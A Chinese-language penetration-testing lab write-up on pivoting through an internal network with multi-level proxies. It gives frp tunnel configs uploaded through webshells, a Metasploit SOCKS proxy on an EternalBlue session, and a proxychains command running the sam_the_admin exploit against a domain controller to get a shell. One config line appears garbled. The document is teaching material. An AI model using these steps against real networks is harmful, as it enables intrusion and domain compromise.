0x01
前言
攻击机(kali):172.16.222.128
入口机:192.168.10.10
winPC:192.168.10.20/ 192.168.20.10
ms17-010:
192.168.20.20/
192.168.30.20
域控:192.168.30.10
0x02
一级代理的建立
在这里简单说一下个人对frp隧道的想法。
frp是指搭建好隧道后,可以通过服务端(frps)将流量转发至客户端(frpc),通过设置代理的方式将流量转发至内网。
此处我们进行一级隧道搭建,将我们的流量转发至入口机,建立正向隧道,将攻击机流量代理至入口机。
1.我们首先需要将服务端(frps)上传在事先准备好的攻击机kali机器上
frps.ini:
[common]
bind_port = 7000
./frps -c frps.ini
2.将客户端(frpc)通过webshell上传到入口机
frpc.ini
[common]
server_addr=172.16.222.128
server_port=7000
[socks5_to_1]
type=tcp
plugin=socks5
remote_port=10088
3.我们这时可以看到一级代理建立成功
4. 一级代理的使用
0x03
二级代理的建立
前面已讲述了利用frp搭建socks隧道,此处搭建二级代理是对一级代理的延申,使其可以将流量转发至内网的192.168.20.*网段。
1.首先我们将服务端(frps)通过webshell上传到入口机
frps.ini:
[common]
bind_port = 7000
2.将客户端(frpc)通过webshell上传到winPC机器
frpc_2.ini
[common]
server_addr = 192.168.10.10
server_port = 7000
[socks5_to_1]
type = tcp
plugin = socks5
remote_port = 10088
3.将新的客户端配置文件(frpc_1.ini)上传到入口机
frpc_1.ini:
[common]
server_addr = 172.16.222.128
server_port = 7000
[socks5_to_1]
type = tcp
plugin = socks5
remote_port = 10088
[socks5_to_2]
type = tcplocal_ip = 127.0.0.1
local_port = 10088
remote_port = 12020
4.具体运行流程
5.我们这时可以看到二级代理建立成功
6. 二级代理的使用
0x04
三级代理的建立
1.配置三级代理信息
msf6 exploit(windows/smb/ms17_010_eternalblue) > use
auxiliary/server/socks_proxy //设置代理
msf6 auxiliary(server/socks_proxy) > show options
Module options (auxiliary/server/socks_proxy):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD no Proxy password for SOCKS5 listener
SRVHOST 0.0.0.0 yes The address to listen on
SRVPORT 1080 yes The port to listen on
USERNAME no Proxy username for SOCKS5 listener
VERSION 5 yes The SOCKS version to use (Accepted: 4a, 5)
Auxiliary action:
Name Description
---- -----------
Proxy Run a SOCKS proxy server
msf6 auxiliary(server/socks_proxy) > set session 2 //设置需要代理的session会话session => 2
msf6 auxiliary(server/socks_proxy) > exploit //建立监听
[*] Auxiliary module running as background job 0.msf6 auxiliary(server/socks_proxy) >
[*] Starting the SOCKS proxy server
2.配置代理服务
sudo vim /etc/proxychains4.conf
socks5 127.0.0.1 12020
sudo proxychains4 python3 sam_the_admin.py HACKER/user:qnmb@123! -dc-ip 192.168.30.10 -shell
0x05
总结
▇ 扫码关注我们 ▇
长白山攻防实验室
学习最新技术知识
原文始发于微信公众号(长白山攻防实验室):内网渗透|内网攻防—多级代理
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论